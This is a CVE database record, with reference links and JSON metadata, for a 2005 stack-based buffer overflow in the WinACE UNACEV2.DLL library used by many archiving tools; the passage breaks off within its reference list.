http://secunia.com/advisories/19458third-party-advisory, x_refsource_SECUNIA
http://secunia.com/secunia_research/2006-25/advisoryx_refsource_MISC
http://securitytracker.com/id?1016012vdb-entry, x_refsource_SECTRACK
https://exchange.xforce.ibmcloud.com/vulnerabilities/26736vdb-entry, x_refsource_XF
http://secunia.com/secunia_research/2006-32/advisory/x_refsource_MISC
http://secunia.com/advisories/19454third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/433258/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/secunia_research/2006-30/advisoryx_refsource_MISC
https://exchange.xforce.ibmcloud.com/vulnerabilities/26315vdb-entry, x_refsource_XF
http://www.securityfocus.com/archive/1/432357/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://www.osvdb.org/25129vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/27763vdb-entry, x_refsource_XF
http://secunia.com/advisories/19834third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/434011/100/0/threadedmailing-list, x_refsource_BUGTRAQ
https://exchange.xforce.ibmcloud.com/vulnerabilities/28787vdb-entry, x_refsource_XF
http://www.securityfocus.com/archive/1/433352/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/20009third-party-advisory, x_refsource_SECUNIA
https://exchange.xforce.ibmcloud.com/vulnerabilities/26480vdb-entry, x_refsource_XF
http://www.vupen.com/english/advisories/2006/2047vdb-entry, x_refsource_VUPEN
https://exchange.xforce.ibmcloud.com/vulnerabilities/26168vdb-entry, x_refsource_XF
http://www.securityfocus.com/bid/14759vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/1836vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1016257vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/19612third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/1565vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/1725vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1015852vdb-entry, x_refsource_SECTRACK
http://marc.info/?l=bugtraq&m=112621008228458&w=2mailing-list, x_refsource_BUGTRAQ
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T22:53:28.858Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "automate-unacev2-bo(26982)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26982"
          },
          {
            "name": "1016512",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016512"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-24/advisory"
          },
          {
            "name": "ADV-2006-2824",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/2824"
          },
          {
            "name": "49",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/49"
          },
          {
            "name": "19884",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/19884"
          },
          {
            "name": "eazel-ztvunacev2-bo(26479)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26479"
          },
          {
            "name": "ADV-2006-1797",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1797"
          },
          {
            "name": "20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/434279/100/0/threaded"
          },
          {
            "name": "1014863",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1014863"
          },
          {
            "name": "1016011",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016011"
          },
          {
            "name": "1016115",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016115"
          },
          {
            "name": "19939",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19939"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-46/advisory/"
          },
          {
            "name": "1016065",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016065"
          },
          {
            "name": "ADV-2006-1835",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1835"
          },
          {
            "name": "1016088",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016088"
          },
          {
            "name": "ADV-2006-3495",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/3495"
          },
          {
            "name": "19967",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19967"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-27/"
          },
          {
            "name": "1016177",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016177"
          },
          {
            "name": "1016114",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016114"
          },
          {
            "name": "powerarchiver-unacev2-ace-bo(26272)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26272"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-50/advisory/"
          },
          {
            "name": "20060501 Secunia Research: WinHKI unacev2.dll Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/432579/100/0/threaded"
          },
          {
            "name": "19931",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19931"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-36/advisory"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-28/advisory"
          },
          {
            "name": "filzip-unacev2-bo(26447)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26447"
          },
          {
            "name": "19975",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19975"
          },
          {
            "name": "ADV-2006-1775",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1775"
          },
          {
            "name": "16479",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/16479"
          },
          {
            "name": "ultimatezip-unacev2-bo(26385)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26385"
          },
          {
            "name": "servant-salamander-unacev2-bo(26116)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26116"
          },
          {
            "name": "20060609 Secunia Research: AutoMate unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/436639/100/0/threaded"
          },
          {
            "name": "ADV-2006-1611",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1611"
          },
          {
            "name": "ADV-2006-1681",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1681"
          },
          {
            "name": "20060511 Secunia Research: UltimateZip unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/433693/100/0/threaded"
          },
          {
            "name": "ADV-2006-2184",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/2184"
          },
          {
            "name": "ADV-2006-1577",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1577"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-33/advisory/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-29/advisory/"
          },
          {
            "name": "20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/434234/100/0/threaded"
          },
          {
            "name": "19938",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19938"
          },
          {
            "name": "19581",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19581"
          },
          {
            "name": "antitrojan-unacev2-bo(26302)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26302"
          },
          {
            "name": "ADV-2006-1694",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1694"
          },
          {
            "name": "20270",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20270"
          },
          {
            "name": "19890",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19890"
          },
          {
            "name": "19977",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19977"
          },
          {
            "name": "winhki-unacev2-bo(26142)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26142"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-38/advisory"
          },
          {
            "name": "19596",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19596"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2005-41/advisory/"
          },
          {
            "name": "1016066",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016066"
          },
          {
            "name": "20060717 Secunia Research: BitZipper unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/440303/100/0/threaded"
          },
          {
            "name": "19458",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19458"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-25/advisory"
          },
          {
            "name": "1016012",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016012"
          },
          {
            "name": "risingantivirus-unacev2-bo(26736)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26736"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-32/advisory/"
          },
          {
            "name": "19454",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19454"
          },
          {
            "name": "20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/433258/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2006-30/advisory"
          },
          {
            "name": "whereisit-unacev2-bo(26315)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26315"
          },
          {
            "name": "20060428 Secunia Research: Servant Salamander unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/432357/100/0/threaded"
          },
          {
            "name": "25129",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/25129"
          },
          {
            "name": "bitzipper-unacev2-bo(27763)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27763"
          },
          {
            "name": "19834",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19834"
          },
          {
            "name": "20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/434011/100/0/threaded"
          },
          {
            "name": "tziptv-unacev2-bo(28787)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28787"
          },
          {
            "name": "20060509 Secunia Research: Where Is It unacev2.dll Buffer OverflowVulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/433352/100/0/threaded"
          },
          {
            "name": "20009",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20009"
          },
          {
            "name": "izarc-unacev2-bo(26480)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26480"
          },
          {
            "name": "ADV-2006-2047",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/2047"
          },
          {
            "name": "extractnow-unacev2-ace-bo(26168)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26168"
          },
          {
            "name": "14759",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/14759"
          },
          {
            "name": "ADV-2006-1836",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1836"
          },
          {
            "name": "1016257",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016257"
          },
          {
            "name": "19612",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19612"
          },
          {
            "name": "ADV-2006-1565",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1565"
          },
          {
            "name": "ADV-2006-1725",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1725"
          },
          {
            "name": "1015852",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015852"
          },
          {
            "name": "20050908 Secunia Research: ALZip ACE Archive Handling Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=112621008228458\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-09-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-19T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "automate-unacev2-bo(26982)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26982"
        },
        {
          "name": "1016512",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016512"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-24/advisory"
        },
        {
          "name": "ADV-2006-2824",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/2824"
        },
        {
          "name": "49",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/49"
        },
        {
          "name": "19884",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/19884"
        },
        {
          "name": "eazel-ztvunacev2-bo(26479)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26479"
        },
        {
          "name": "ADV-2006-1797",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1797"
        },
        {
          "name": "20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/434279/100/0/threaded"
        },
        {
          "name": "1014863",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1014863"
        },
        {
          "name": "1016011",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016011"
        },
        {
          "name": "1016115",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016115"
        },
        {
          "name": "19939",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19939"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-46/advisory/"
        },
        {
          "name": "1016065",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016065"
        },
        {
          "name": "ADV-2006-1835",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1835"
        },
        {
          "name": "1016088",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016088"
        },
        {
          "name": "ADV-2006-3495",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/3495"
        },
        {
          "name": "19967",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19967"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-27/"
        },
        {
          "name": "1016177",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016177"
        },
        {
          "name": "1016114",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016114"
        },
        {
          "name": "powerarchiver-unacev2-ace-bo(26272)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26272"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-50/advisory/"
        },
        {
          "name": "20060501 Secunia Research: WinHKI unacev2.dll Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/432579/100/0/threaded"
        },
        {
          "name": "19931",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19931"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-36/advisory"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-28/advisory"
        },
        {
          "name": "filzip-unacev2-bo(26447)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26447"
        },
        {
          "name": "19975",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19975"
        },
        {
          "name": "ADV-2006-1775",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1775"
        },
        {
          "name": "16479",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/16479"
        },
        {
          "name": "ultimatezip-unacev2-bo(26385)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26385"
        },
        {
          "name": "servant-salamander-unacev2-bo(26116)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26116"
        },
        {
          "name": "20060609 Secunia Research: AutoMate unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/436639/100/0/threaded"
        },
        {
          "name": "ADV-2006-1611",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1611"
        },
        {
          "name": "ADV-2006-1681",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1681"
        },
        {
          "name": "20060511 Secunia Research: UltimateZip unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/433693/100/0/threaded"
        },
        {
          "name": "ADV-2006-2184",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/2184"
        },
        {
          "name": "ADV-2006-1577",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1577"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-33/advisory/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-29/advisory/"
        },
        {
          "name": "20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/434234/100/0/threaded"
        },
        {
          "name": "19938",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19938"
        },
        {
          "name": "19581",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19581"
        },
        {
          "name": "antitrojan-unacev2-bo(26302)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26302"
        },
        {
          "name": "ADV-2006-1694",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1694"
        },
        {
          "name": "20270",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20270"
        },
        {
          "name": "19890",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19890"
        },
        {
          "name": "19977",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19977"
        },
        {
          "name": "winhki-unacev2-bo(26142)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26142"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-38/advisory"
        },
        {
          "name": "19596",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19596"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2005-41/advisory/"
        },
        {
          "name": "1016066",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016066"
        },
        {
          "name": "20060717 Secunia Research: BitZipper unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/440303/100/0/threaded"
        },
        {
          "name": "19458",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19458"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-25/advisory"
        },
        {
          "name": "1016012",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016012"
        },
        {
          "name": "risingantivirus-unacev2-bo(26736)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26736"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2006-32/advisory/"
        },
        {
          "name": "19454",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19454"
        },
        {
          "name": "20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/433258/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
